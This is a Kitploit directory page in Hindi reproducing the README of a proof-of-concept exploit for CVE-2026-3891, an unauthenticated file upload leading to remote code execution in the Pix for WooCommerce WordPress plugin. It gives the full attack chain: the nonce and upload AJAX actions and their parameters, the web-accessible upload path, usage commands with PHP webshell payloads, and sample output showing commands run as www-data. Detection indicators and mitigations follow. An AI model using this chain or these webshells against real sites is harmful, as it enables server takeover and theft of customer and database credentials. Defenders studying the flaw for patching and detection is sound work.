Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-3891 — CVE-2026-3891 के लिए PoC – Pix for WooCommerce ≤ 1.5.0 में बिना प्रमाणीकरण के फ़ाइल अपलोड RCE। स्वचालित nonce पुनर्प्राप्ति, PHP अपलोड, और कमांड निष्पादन। | Kitploit
उपकरण/GitHubGitHub/ch4120n/cve-2026-3891
शोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubch4120n/cve-2026-3891

CVE-2026-3891

CVE-2026-3891 के लिए PoC – Pix for WooCommerce ≤ 1.5.0 में बिना प्रमाणीकरण के फ़ाइल अपलोड RCE। स्वचालित nonce पुनर्प्राप्ति, PHP अपलोड, और कमांड निष्पादन।

रिपॉजिटरी देखें
21 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚀 CVE-2026-3891 – Pix for WooCommerce अप्रमाणित फ़ाइल अपलोड RCE

Python Exploit CVE

GitHub stars GitHub issues License

CVE-2026-3891 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट – Pix for WooCommerce WordPress प्लगइन (≤ 1.5.0) में अप्रमाणित मनमाना फ़ाइल अपलोड जो रिमोट कोड निष्पादन की ओर ले जाता है।


📖 अवलोकन

CVE-2026-3891 Pix for WooCommerce प्लगइन में एक गंभीर भेद्यता है, जो 1.5.0 तक के सभी संस्करणों को प्रभावित करती है। प्लगइन अपने AJAX हैंडलर में उचित प्राधिकरण और फ़ाइल-प्रकार की जाँच लागू करने में विफल रहता है। एक अप्रमाणित हमलावर इस दोष का दुरुपयोग करके सार्वजनिक रूप से सुलभ निर्देशिका में मनमानी PHP फ़ाइलें अपलोड कर सकता है और अंतर्निहित WordPress सर्वर पर रिमोट कोड निष्पादन प्राप्त कर सकता है।

lkn_pix_for_woocommerce_c6_save_settings

इस रिपॉजिटरी में एक प्रोडक्शन-ग्रेड PoC है जो पूरी हमला श्रृंखला को स्वचालित करता है – एक वैध नॉन्स प्राप्त करने से लेकर वेबशेल अपलोड करने तक – मजबूत त्रुटि प्रबंधन और एक सुंदर CLI इंटरफ़ेस के साथ।

🔍 मुख्य विशेषताएँ

  • वास्तव में अप्रमाणित – कोई WordPress क्रेडेंशियल या सत्र कुकीज़ आवश्यक नहीं हैं।
  • स्वचालित नॉन्स निष्कर्षण – एक्सप्लॉइट उसी सार्वजनिक AJAX इंटरफ़ेस के माध्यम से आवश्यक सुरक्षा नॉन्स प्राप्त करता है।
  • मल्टीपार्ट फ़ाइल अपलोड – भेद्य हैंडलर द्वारा अपेक्षित certificate_crt_path फ़ाइल पैरामीटर को सही ढंग से तैयार करता है।
  • सीधा URL निर्माण – अपलोड किए गए पेलोड का सार्वजनिक URL तुरंत प्रदान करता है।
  • पोस्ट-एक्सप्लॉइटेशन जाँच – अपलोड सफलता का वैकल्पिक सत्यापन और इंस्टेंट कमांड निष्पादन (--check)।
  • उन्नत त्रुटि प्रबंधन – Cloudflare, WAF, टाइमआउट और विकृत प्रतिक्रियाओं से सुचारू रूप से निपटता है।
  • स्वच्छ, सूचनात्मक आउटपुट – त्वरित पठनीयता के लिए सभी संदेश [ * ], [ + ], [ - ], [ ! ] से उपसर्गित हैं।

🧬 भेद्यता विवरण

मूल कारण प्लगइन द्वारा पंजीकृत दो AJAX एक्शन में निहित है:

1. lkn_pix_for_woocommerce_generate_nonce

root@kitploit:~
add_action('wp_ajax_nopriv_lkn_pix_for_woocommerce_generate_nonce', ...);

यह एक्शन wp_ajax_nopriv_* से हुक किया गया है, जो इसे अप्रमाणित आगंतुकों के लिए सुलभ बनाता है। यह lkn_pix_for_woocommerce_c6_settings_nonce एक्शन के लिए एक नॉन्स उत्पन्न करता है और उसे JSON एनवलप में लौटाता है:

root@kitploit:~
{"success":true,"data":{"nonce":"abc123..."}}

कोई क्षमता जाँच या उपयोगकर्ता प्रमाणीकरण नहीं किया जाता – कोई भी व्यक्ति एक वैध नॉन्स का अनुरोध कर सकता है।

2. lkn_pix_for_woocommerce_c6_save_settings

root@kitploit:~
add_action('wp_ajax_lkn_pix_for_woocommerce_c6_save_settings', ...);

यह हैंडलर प्लगइन सेटिंग्स सहेजता है, जिसमें certificate_crt_path नामक एक फ़ाइल अपलोड फ़ील्ड शामिल है। यद्यपि अपलोड WordPress के media_handle_upload हेल्पर के माध्यम से होता है, प्लगइन निम्नलिखित नहीं करता:

  • सत्यापित करना कि अनुरोध किसी प्रमाणित, अधिकृत उपयोगकर्ता से आ रहा है (current_user_can अनुपस्थित)।
  • किसी भी फ़ाइल प्रकार या एक्सटेंशन प्रतिबंध को लागू करना (जैसे, .php फ़ाइलों की अनुमति देना)।
  • फ़ाइल को एक गैर-निष्पादन योग्य स्थान पर संग्रहीत करना – यह यहाँ पहुँचती है:
    root@kitploit:~
    wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/
    
    जो सीधे वेब के माध्यम से सुलभ है।

चूँकि नॉन्स केवल CSRF से सुरक्षा करता है, और इसे कोई भी प्राप्त कर सकता है, एक हमलावर मनमानी PHP कोड अपलोड और निष्पादित करने के लिए इन दो एक्शन को जोड़ सकता है।

प्रभावित संस्करण

  • Pix for WooCommerce संस्करण ≤ 1.5.0
  • यह भेद्यता डिफ़ॉल्ट कॉन्फ़िगरेशन वाले स्वच्छ WordPress इंस्टॉलेशन पर पुष्ट की गई है।

प्रभाव

  • रिमोट कोड निष्पादन – वेब सर्वर के विशेषाधिकारों के साथ पूर्ण वेबशेल पहुँच (आमतौर पर www-data या apache)।
  • डेटा एक्सफिल्ट्रेशन – wp-config.php, डेटाबेस क्रेडेंशियल, ग्राहक डेटा पढ़ना।
  • स्थिरता (Persistence) – कोर फ़ाइलों को संशोधित करना, बैकडोर स्थापित करना।
  • पूर्ण साइट अधिग्रहण – यदि डेटाबेस सुलभ है, तो WordPress एडमिन तक विशेषाधिकार वृद्धि।

🛠️ शोषण आवश्यकताएँ

  • लक्ष्य WordPress साइट तक नेटवर्क पहुँच (कोई प्रमाणीकरण आवश्यक नहीं)।
  • requests लाइब्रेरी के साथ Python 3.8+ (pip install requests के माध्यम से स्थापित करें)।
  • लक्ष्य में भेद्य प्लगइन स्थापित और सक्रिय होना चाहिए (डिफ़ॉल्ट कॉन्फ़िगरेशन पर्याप्त है)।

🚀 उपयोग

स्थापना

root@kitploit:~
git clone https://github.com/Ch4120N/CVE-2026-3891.git
cd CVE-2026-3891
pip install -r requirements.txt   # requests

मूल कमांड

root@kitploit:~
python CVE-2026-3891.py http://target.com/wordpress

अधिक नियंत्रण के लिए, कमांड-लाइन विकल्पों का उपयोग करें:

root@kitploit:~
python CVE-2026-3891.py https://example.com \
  -f shell.php \
  -p '<?php system($_GET["c"]); ?>' \
  --check \
  --timeout 20

उदाहरण आउटपुट

root@kitploit:~
  ___  _  _  ____     ___   ___  ___    _       ___  ___  ___  __ 
 / __)( \/ )( ___)___(__ \ / _ \(__ \  / )  ___(__ )( _ )/ _ \/  )
( (__  \  /  )__)(___)/ _/( (_) )/ _/ / _ \(___)(_ \/ _ \\_  / )( 
 \___)  \/  (____)   (____)\___/(____)\___/    (___/\___/ (_/ (__)
                        [CVE-2026-3891]
          Pix for WooCommerce Unauthenticated File Upload
                         Owner: Ch4120N

[ * ] Warming up session (fetching homepage)...
[ * ] Homepage status: 200
[ * ] Requesting nonce (attempt 1/2)...
[ * ] Response status: 200
[ + ] Nonce obtained: 7e8f9a0b1c
[ * ] Uploading payload as woocommerce.php...
[ * ] Upload response status: 200
[ + ] Payload delivered to server.
[ * ] Verifying uploaded file at: http://192.168.56.102/wp-content/plugins/.../certs_c6/woocommerce.php
[ + ] File is accessible (HTTP 200).
[ + ] Webshell URL: http://192.168.56.102/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php

# Optional check:
[ * ] Checking shell with command: id
[ + ] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

कमांड-लाइन विकल्प

फ़्लैगविवरणडिफ़ॉल्ट
target (स्थितीय)WordPress साइट का आधार URL।आवश्यक
-f, --filenameअपलोड की गई PHP फ़ाइल का नाम।woocommerce.php
-p, --payloadअपलोड करने के लिए PHP कोड।<?php if(isset($_REQUEST["cmd"])){system($_REQUEST["cmd"]);} ?>
-t, --timeoutअनुरोध टाइमआउट सेकंड में।15
-r, --retriesनॉन्स प्राप्ति के लिए अधिकतम पुनः प्रयास।2
--no-bannerASCII कला छिपाएँ।(बंद)
--no-verifyअपलोड के बाद पहुँच जाँच छोड़ें।(बंद)
--checkअपलोड के बाद वेबशेल पर id निष्पादित करें।(बंद)

🧪 पहचान और ट्यूनिंग के लिए तकनीकी विवरण

नॉन्स जनरेशन एंडपॉइंट

  • URL: http://target/wp-admin/admin-ajax.php
  • एक्शन: lkn_pix_for_woocommerce_generate_nonce
  • पैरामीटर: action_name=lkn_pix_for_woocommerce_c6_settings_nonce
  • प्रतिक्रिया: {"success":true,"data":{"nonce":"..."}}
  • नोट: नॉन्स हमेशा प्राप्त करने योग्य है क्योंकि एक्शन wp_ajax_nopriv_* के साथ पंजीकृत है। कोई कुकी या सत्र आवश्यक नहीं है।

फ़ाइल अपलोड पैरामीटर

  • URL: वही admin-ajax.php
  • एक्शन: lkn_pix_for_woocommerce_c6_save_settings
  • आवश्यक फ़ील्ड:
    • _ajax_nonce – पहले प्राप्त किया गया नॉन्स
    • certificate_crt_path – एक मल्टीपार्ट फ़ाइल अपलोड (पेलोड)
  • फ़ाइल प्रकार: प्लगइन एक्सटेंशन को मान्य नहीं करता, इसलिए .php फ़ाइलें बिना नाम बदले स्वीकार और संग्रहीत की जाती हैं।

सार्वजनिक भंडारण पथ

सफल अपलोड के बाद, फ़ाइल यहाँ स्थित होती है:

root@kitploit:~
/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/<filename>

यह निर्देशिका सीधे वेब-सुलभ है; यदि वेब सर्वर PHP फ़ाइलों को प्रोसेस करने के लिए कॉन्फ़िगर है तो उन्हें निष्पादित किया जाएगा (जो WordPress-प्रबंधित सर्वरों के लिए डिफ़ॉल्ट है)।

समझौता संकेतक (IoCs)

  • certs_c6 निर्देशिका में अप्रत्याशित PHP फ़ाइलों का दिखना (विशेष रूप से woocommerce.php, shell.php आदि जैसी फ़ाइलें)।
  • अविश्वसनीय IP से उत्पन्न, ऊपर सूचीबद्ध एक्शन वाले असामान्य admin-ajax.php POST अनुरोध।
  • एक्सेस लॉग जो ?cmd=id जैसे क्वेरी पैरामीटर के साथ .../certs_c6/ पर सीधे हिट दिखाते हैं।

🛡️ पहचान और शमन

पहचान

अपने WordPress लॉग में निम्नलिखित की निगरानी करें:

  • action=lkn_pix_for_woocommerce_generate_nonce और action=lkn_pix_for_woocommerce_c6_save_settings के साथ /wp-admin/admin-ajax.php पर बार-बार POST अनुरोध।
  • certs_c6 फ़ोल्डर में नई फ़ाइलों का निर्माण। परिवर्तनों पर अलर्ट के लिए फ़ाइल अखंडता निगरानी उपकरण (जैसे, Tripwire, OSSEC) का उपयोग करें।
  • वेब सर्वर लॉग जो बाहरी IP से उस निर्देशिका में PHP फ़ाइलों के निष्पादन को दर्शाते हैं।

शमन

  1. प्लगइन अपडेट करें – उस संस्करण >1.5.0 की जाँच करें जिसमें आधिकारिक सुधार शामिल है (यदि जारी हुआ है)।
  2. वर्चुअल पैच लागू करें – WAF नियम (जैसे, ModSecurity, Cloudflare WAF) के साथ भेद्य AJAX एक्शन तक पहुँच को अवरुद्ध करें।
  3. फ़ाइल निष्पादन प्रतिबंधित करें – यदि प्लगइन आवश्यक है, तो अपने वेब सर्वर को certs_c6 निर्देशिका के अंदर PHP निष्पादन से इनकार करने के लिए कॉन्फ़िगर करें (जैसे, php_flag engine off के साथ .htaccess का उपयोग करके)।
  4. AJAX हैंडलर को सख्त करें – यदि आप प्लगइन का रखरखाव करते हैं, तो सुनिश्चित करें कि दोनों एक्शन केवल प्रमाणित और अधिकृत उपयोगकर्ताओं के लिए सुलभ हैं (नॉन्स जनरेशन के लिए current_user_can('manage_options'), और अपलोड के लिए उचित नॉन्स सत्यापन के साथ क्षमता जाँच)।
  5. प्लगइन अक्षम करें – यदि Pix for WooCommerce आवश्यक नहीं है, तो इसे पूरी तरह से हटा दें।

👏 श्रेय

  • एक्सप्लॉइट विकास और PoC: Ch4120N
  • भेद्यता विश्लेषण: स्वतंत्र सुरक्षा अनुसंधान

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।

अस्वीकरण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उपयोग के लिए है। इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।


📚 संदर्भ

  • NIST NVD – CVE-2026-3891
  • WordPress प्लगइन रिपॉज़िटरी – Pix for WooCommerce (फिक्स्ड संस्करणों के लिए चेंजलॉग देखें)
  • Patchstack / WPScan भेद्यता डेटाबेस (यदि प्रविष्टि मौजूद है)

⭐ सहायता

यदि आपको यह PoC उपयोगी लगे, तो GitHub पर इसे ⭐ देने और जिम्मेदारी से साझा करने पर विचार करें। योगदान, मुद्दे और पुल रिक्वेस्ट का स्वागत है!


हैप्पी हैकिंग! 🛡️

टूल डाउनलोड करें